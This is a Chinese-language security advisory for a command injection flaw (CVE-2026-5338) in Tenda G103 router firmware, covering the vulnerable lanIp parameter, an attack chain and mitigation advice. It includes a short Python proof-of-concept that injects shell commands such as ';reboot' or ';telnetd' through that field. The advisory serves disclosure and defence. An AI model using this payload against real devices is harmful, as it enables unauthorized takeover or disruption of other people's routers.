CVE-2026-5338 CVSS 4.7 中危

Tenda G103 命令注入漏洞 (CVE-2026-5338)

披露日期: 2026-04-02

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5338

漏洞类型

命令注入

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Tenda G103

漏洞概述

Tenda G103 1.0.0.5版本存在命令注入漏洞。该漏洞源于Setting Handler组件中的`action_set_system_settings`函数未对`lanIp`参数进行有效过滤。攻击者需具备高权限，利用此参数注入恶意命令，从而在目标系统上执行任意代码，对设备的机密性、完整性和可用性造成影响。

技术细节

该漏洞位于Tenda G103路由器固件V1.0.0.5中，具体涉及文件`system.lua`的`action_set_system_settings`函数。在处理系统设置时，该函数直接将用户输入的`lanIp`参数传递给系统命令执行环境，未进行严格的输入验证和转义。由于CVSS向量显示需要高权限（PR:H），攻击者通常需要先登录管理后台。利用时，攻击者构造包含Shell元字符（如`;`或`&&`）的恶意载荷作为`lanIp`值发送给服务器。服务器解析请求后，会将该参数拼接到系统命令中执行，导致恶意代码被运行。这允许攻击者获取底层Shell权限，进而完全控制设备或导致拒绝服务。

攻击链分析

STEP 1

侦察

攻击者识别网络中存在的Tenda G103设备，并确认其固件版本为1.0.0.5。

STEP 2

获取权限

由于漏洞需要高权限（PR:H），攻击者通过暴力破解、钓鱼或利用其他漏洞获取路由器管理后台的合法凭据。

STEP 3

漏洞利用

攻击者向`/goform/system/set_system_settings`接口发送POST请求，在`lanIp`参数中注入恶意Shell命令。

STEP 4

执行命令

服务器端解析请求，将恶意参数拼接到系统命令中执行，导致攻击者在设备上获得任意代码执行权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (example)
target_url = "http://<target_ip>/goform/system/set_system_settings"

# Injecting a command via the lanIp parameter
# Example payload: ;reboot or ;telnetd
payload = {
    "lanIp": "192.168.0.1; <inject_command_here>",
    # Other parameters may be required based on function logic
}

# Authentication is typically required due to PR:H
cookies = {
    "Cookie": "user_auth_token_here"
}

try:
    response = requests.post(target_url, data=payload, cookies=cookies, timeout=5)
    if response.status_code == 200:
        print("Request sent successfully, check device for command execution.")
    else:
        print(f"Failed to send request, status code: {response.status_code}")
except Exception as e:
    print(f"An error occurred: {e}")

影响范围

Tenda G103 1.0.0.5

防御指南

临时缓解措施

建议用户立即访问Tenda官方网站检查并下载最新的固件更新进行安装。在无法立即升级的情况下，应确保路由器管理界面不暴露在公网，并严格限制有权访问管理界面的用户，以减少被高权限账户利用的风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5338
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5338
3 Details https://www.cvedetails.com/cve/CVE-2026-5338/
4 VulDB https://vuldb.com/cve/CVE-2026-5338
5 Link https://github.com/ZZ2266/.github.io/tree/main/Tenda%20G103/action_set_system_settings
6 Link https://vuldb.com/submit/781131
7 Link https://vuldb.com/vuln/354669
8 Link https://vuldb.com/vuln/354669/cti
9 Link https://www.tenda.com.cn/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表